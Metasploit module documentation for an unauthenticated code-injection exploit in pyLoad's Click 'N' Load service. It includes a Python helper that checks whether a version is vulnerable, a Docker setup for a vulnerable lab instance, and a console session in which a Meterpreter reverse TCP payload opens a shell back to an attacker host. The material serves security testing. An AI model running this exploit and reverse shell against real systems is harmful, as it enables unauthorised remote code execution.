documentation/modules/exploit/linux/http/pyload_js2py_exec.md
## Vulnerable Application

pyLoad versions prior to 0.5.0b3.dev31 are vulnerable to Python code injection because of the `pyimport` functionality exposed through the js2py library. An unauthenticated attacker can send a crafted POST request to the `flash/addcrypted2` endpoint to obtain code execution. pyLoad by default runs two services: the primary web UI on port 8000, which cannot be used from external hosts, and a secondary "Click 'N' Load" service on port 9666, which can be used remotely without authentication.
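The version boundary above is the first thing to check before firing the module, and naive string comparison gets pre-release and `.dev` segments wrong (`"0.5.0b3" < "0.5.0b3.dev31"` is true as strings but false as versions). The following is an added example, not part of the Metasploit module or of pyLoad: it orders pyload-ng version strings the way PEP 440 does and decides whether a version predates 0.5.0b3.dev31. The helper that pulls the version out of a linuxserver.io image tag is an assumption added for convenience; how you learn the running version on a real target is out of scope here.

```python
import re

# First pyload-ng version that carries the js2py pyimport fix, as stated in the
# module description ("prior to 0.5.0b3.dev31").
FIXED_VERSION = "0.5.0b3.dev31"

# Matches the version shapes pyload-ng uses: a dotted release, an optional
# a/b/rc pre-release segment and an optional .devN segment (a PEP 440 subset;
# post-releases and local version labels are deliberately not handled).
_VERSION_RE = re.compile(
    r"^v?(?P<release>\d+(?:\.\d+)*)"
    r"(?:(?P<pre_l>a|b|rc)(?P<pre_n>\d+))?"
    r"(?:\.dev(?P<dev_n>\d+))?$"
)
_PRE_ORDER = {"a": 0, "b": 1, "rc": 2}


def version_key(version):
    """Return a tuple that sorts pyload-ng version strings in PEP 440 order.

    Ordering reproduced here: X.dev < Xa1 < Xb1.dev < Xb1 < Xrc1 < X, so
    0.5.0b3.dev30 < 0.5.0b3.dev31 < 0.5.0b3 < 0.5.0.
    """
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unsupported version string: {version!r}")

    release = [int(part) for part in m.group("release").split(".")]
    while len(release) > 1 and release[-1] == 0:   # 0.5.0 == 0.5
        release.pop()

    has_dev = m.group("dev_n") is not None
    if m.group("pre_l") is not None:
        pre = (_PRE_ORDER[m.group("pre_l")], int(m.group("pre_n")))
    elif has_dev:
        pre = (-1, 0)   # X.devN sorts before any pre-release of X
    else:
        pre = (3, 0)    # a final release sorts after any a/b/rc of it
    dev = int(m.group("dev_n")) if has_dev else float("inf")  # no .dev sorts last
    return (tuple(release), pre, dev)


def is_vulnerable(version):
    """True if the given pyload-ng version predates the fix."""
    return version_key(version) < version_key(FIXED_VERSION)


def version_from_image_tag(tag):
    """Extract the version from a linuxserver/pyload-ng image reference such as
    'lscr.io/linuxserver/pyload-ng:version-0.5.0b3.dev30' (assumed tag layout)."""
    m = re.search(r":version-(?P<v>\S+)$", tag)
    if not m:
        raise ValueError(f"no version- tag found in {tag!r}")
    return m.group("v")


if __name__ == "__main__":
    for v in ("0.5.0b3.dev30", "0.5.0b3.dev31", "0.5.0b3", "0.5.0"):
        print(f"{v:16} vulnerable={is_vulnerable(v)}")
```

Only the `.dev30` image from the setup below is reported vulnerable; `0.5.0b3.dev31`, the `0.5.0b3` beta and the `0.5.0` release all sort at or above the fix.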
## Verification Steps

1. `use exploit/linux/http/pyload_js2py_exec`
2. Set `RHOSTS`, `PAYLOAD` and the payload's associated options
3. `run`

## Setup

A vulnerable instance can be started with the linuxserver.io container image:

```
docker run -d \
  --name=pyload-ng \
  -e PUID=1000 \
  -e PGID=1000 \
  -e TZ=Etc/UTC \
  -p 8000:8000 \
  -p 9666:9666 \
  --restart unless-stopped \
  lscr.io/linuxserver/pyload-ng:version-0.5.0b3.dev30
```
## Scenarios

### pyLoad 0.5.0b3.dev30 in Docker

```
msf > use exploit/linux/http/pyload_js2py_exec
[*] Using configured payload cmd/unix/generic
msf exploit(linux/http/pyload_js2py_exec) > set RHOSTS 192.168.159.128
RHOSTS => 192.168.159.128
msf exploit(linux/http/pyload_js2py_exec) > set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp
PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
msf exploit(linux/http/pyload_js2py_exec) > set LHOST 192.168.250.134
LHOST => 192.168.250.134
msf exploit(linux/http/pyload_js2py_exec) > exploit

[*] Started reverse TCP handler on 192.168.250.134:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Successfully tested command injection.
[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
[*] Sending stage (24380 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (192.168.250.134:4444 -> 172.17.0.2:40830) at 2023-02-15 15:28:52 -0500

meterpreter > getuid
Server username: abc
meterpreter > sysinfo
Computer     : f03ec089a4fe
OS           : Linux 6.0.18-200.fc36.x86_64 #1 SMP PREEMPT_DYNAMIC Sat Jan 7 17:08:48 UTC 2023
Architecture : x64
Meterpreter  : python/linux
meterpreter > pwd
/config/data
meterpreter >
```